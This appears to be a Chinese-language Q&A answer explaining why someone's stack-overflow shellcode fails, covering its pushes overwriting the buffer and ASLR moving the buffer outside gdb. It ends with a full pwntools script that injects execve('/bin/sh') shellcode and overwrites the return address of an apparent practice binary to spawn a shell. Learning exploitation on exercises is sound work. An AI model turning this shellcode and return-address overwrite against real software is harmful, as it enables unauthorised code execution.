看起来你有两个问题。

1）您正在用那些push-es覆盖您的输入缓冲区，因此为什么堆栈上有一些垃圾，这就是我们的应用程序崩溃的原因。

请参阅这两张图片，这些图片显示了对 /bin/sh 执行第二次推送之前和之后的程序集

前

后

您可以清楚地看到奇数das和bound操作码而不是pushes。

2）您没有考虑到代码被重新定位，因此您的缓冲区并不总是在同一个地方。当您运行时，gdb您的代码将跳转到缓冲区的开头（这是部分\xc0\xd0\xff\xff）并且对于您的gdb会话，这是正确的，因为gdb关闭了ASLR。

您可以通过在以下命令中发出此命令来检查gdb：

gdb-peda$ show disable-randomization
禁用调试对象的虚拟地址空间的随机化已打开。

如果您更改它，set disable-randomization off它也应该开始失败，gdb因为缓冲区每次都将位于不同的位置。

为了正确执行此操作，您需要找到缓冲区的位置。这也是为什么您在第一条消息中的位置有提示的原因。

为了弥补这两个问题，我会为此使用pwntools并准备一个脚本：

from pwn import *

context(arch='i386', os='linux')

r = process('./shellcoding.dms')
# read the line that has the info about the address
l = r.recvline()
print l
# extract it
addr = int(l[18:], 16)
#nop sled at the end but not actually needed. We only need to fill the space for the buffer to overwrite the ret
exploit = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"\x90"*21 
print "Address is: "+hex(addr)
# add an address to be taken from the stack by ret
exploit += p32(addr) 

r.send(exploit+"\n")
# read the "ok... lets see if you got it..." message
r.recvline()
r.interactive() #pwn

运行这个应该有效！